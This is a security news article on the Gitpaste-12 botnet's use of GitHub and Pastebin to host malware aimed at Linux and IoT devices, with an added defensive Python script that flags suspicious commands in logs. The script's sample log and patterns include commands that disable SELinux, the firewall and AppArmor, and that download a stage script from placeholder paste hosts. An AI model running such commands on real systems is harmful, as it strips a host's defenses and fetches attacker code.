Hackers Exploiting GitHub and Pastebin Resources to Spread Malware
- By Dawna M. Roberts
- Published: Nov 09, 2020
- Last Updated: Nov 23, 2023
Everything has ramped up in 2020, especially hackers, cybercriminals, and their techniques. Threat researchers recently discovered that hackers are using the Gitpaste-12 botnet to target Linux and IoT devices.
Hackers’ Latest Trend
The latest trend seen by security professionals is hacker groups building botnets that use legitimate resources such as Dropbox, Box, GitHub, and Pastebin to store malicious files undetected and make those files appear more authentic.
Juniper Threat Labs recently published a report on the Gitpaste-12 botnet, which it discovered in October. However, all indications are that the attackers set it up in July 2020. The report notes that Gitpaste-12 uses 12 different malware modules to attack IoT devices and Linux applications.
What concerns threat researchers the most is the widespread use of legitimate online resources for malicious file repositories. Because the malware appears to come from secure, legitimate online resources, it may be harder to discover and more dangerous for victims.
Juniper Threat Labs identified at least one purpose for Gitpaste-12: cryptocurrency mining, specifically of Monero.
Alex Burt and Trevor Pott of Juniper Threat Labs explained the appeal of these services to Information Security Media Group. “Almost any free hosting can be used to host malware or as a command-and-control,” Burt said. “GitHub and Pastebin provide HTTPS access, and it is easy to create new accounts. In many cases, it’s more convenient than creating their own hosting infrastructure because GitHub and Pastebin domains are not blacklisted by security companies. From a security team’s perspective, a traffic request to GitHub would not look suspicious.”
The Juniper team contacted both GitHub and Pastebin to notify them of the threat, and both responded quickly by taking down the hosted malicious files.
How it Works
Recently another cybercriminal sent out phishing emails to the faculty members of a large college urging them to take a COVID-19 survey stored on Dropbox. The template used was infected with malicious macros. Thankfully, none of the recipients clicked the link or turned on macros before the IT department found the infection and alerted the authorities.
In its report, Juniper notes that the botnet specifically targets open-source projects such as Apache Struts, along with routers and other network devices from well-known manufacturers such as Asus, Netlink, and Huawei. The method of entry is most often a brute-force attack. Once the botnet gains control of a device, it installs malicious code that periodically checks back with the command-and-control server for updates. Juniper explains, “The malware begins by preparing the environment. This means stripping the system of its defenses, including firewall rules, SELinux, AppArmor, as well as common attack prevention and monitoring software.”
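As an added example (not code from Juniper's report or from the original article), the following Python script turns the two behaviours described above, disabling host defenses and then fetching from GitHub or Pastebin, into detection logic run over constructed shell-command log lines. The "user: command" log format, the user names, and the URLs are assumptions made for the sample.

```python
import re

# Constructed sample of a simple "user: command" shell-command log (not real telemetry).
# Paths, user names and repository/paste names are placeholders.
SAMPLE_LOG = """
root: setenforce 0
root: iptables -F
root: systemctl stop apparmor
root: curl -s https://pastebin.com/raw/EXAMPLE -o /tmp/stage.sh
root: wget https://raw.githubusercontent.com/EXAMPLEUSER/EXAMPLEREPO/master/stage.sh
admin: git pull origin main
admin: iptables -L
"""

# Commands that match the "preparing the environment" step: stripping firewall,
# SELinux, AppArmor and monitoring services from the host.
DEFENSE_TAMPER = [
    (r"\bsetenforce\s+0\b", "SELinux switched to permissive"),
    (r"\biptables\s+(-F|--flush)\b", "firewall rules flushed"),
    (r"\bsystemctl\s+(stop|disable)\s+(apparmor|firewalld|auditd)\b", "security service stopped"),
]

# Non-browser downloads from raw paste/repository hosts, which a proxy would not
# normally block because the domains are not blacklisted.
PASTE_HOST_FETCH = re.compile(
    r"\b(curl|wget)\b.*https?://(pastebin\.com/raw|raw\.githubusercontent\.com)/", re.I)


def scan(log_text):
    """Return one finding per matching command, tagged by category."""
    findings = []
    for n, line in enumerate(log_text.strip().splitlines(), 1):
        for pattern, reason in DEFENSE_TAMPER:
            if re.search(pattern, line):
                findings.append({"line": n, "category": "defense_tamper", "reason": reason, "cmd": line})
        if PASTE_HOST_FETCH.search(line):
            findings.append({"line": n, "category": "paste_host_fetch",
                             "reason": "command-line download from paste/raw host", "cmd": line})
    return findings


def triage(findings):
    """Both behaviours together on one host is the pattern the report describes: escalate."""
    categories = {f["category"] for f in findings}
    if {"defense_tamper", "paste_host_fetch"} <= categories:
        return "high"
    return "medium" if categories else "none"


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for hit in hits:
        print(f"line {hit['line']}: [{hit['category']}] {hit['reason']}: {hit['cmd']}")
    print("severity:", triage(hits))
```

Either behaviour alone has benign explanations (an administrator flushing rules, a developer fetching a script), which is why the triage step only escalates when the defense-tampering and the paste-host fetch appear together.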
On examining the code, security researchers found that some of the text in it is written in Chinese.
Alarmingly, some of the modules also behave like worms, infecting other devices to spread and expand the botnet further.
Juniper’s Burt and Pott comment, “No malware is good to have, but worms are particularly annoying. Their ability to spread in an automated fashion can lead to lateral spread within an organization or to your hosts attempting to infect other networks across the internet, resulting in poor reputation for your organization.”
So Many Threats on the Horizon
Over the past year, quite a few botnets have been discovered, and a few have been temporarily disabled by authorities. Many are built specifically to target IoT devices and Linux applications. One such botnet, Kaiji, brute-forces SSH logins and can also launch denial-of-service attacks.
Just last month, in a joint effort, Microsoft and several government agencies took down the notorious Trickbot botnet, crippling its operations, at least for now.
Additionally, hackers are using another botnet, named KashmirBlack, to target websites running vulnerable content management systems (CMS) such as WordPress, Joomla, and Magento.
As reported by DataBreach Today, Avira Protection Lab identified another botnet that uses a variant of Mirai to target IoT devices. This particular threat is highly sophisticated, with individual encryption keys, denial-of-service capabilities, and self-replication techniques built in.
Why Botnets?
The term botnet is thrown around pretty liberally these days. So, what is a botnet? According to Kaspersky Labs, “Botnets are networks of hijacked computer devices used to carry out various scams and cyberattacks.” The word itself is a combination of “robot” and “network.”
These networks link exploited devices together into a vast pool of computers, applications, and other hardware that can then infect further devices for data theft, malware and ransomware infections, or other purposes. Botnets are usually one layer of a multi-stage scheme, and infecting the devices is only step one. Kaspersky has a great article that explains all about botnets.
The reason this model works so well is that once activated, the botnet works on its own, automating the process of growing the network and infecting devices. Botnets save time and effort so that hackers can focus on the prize.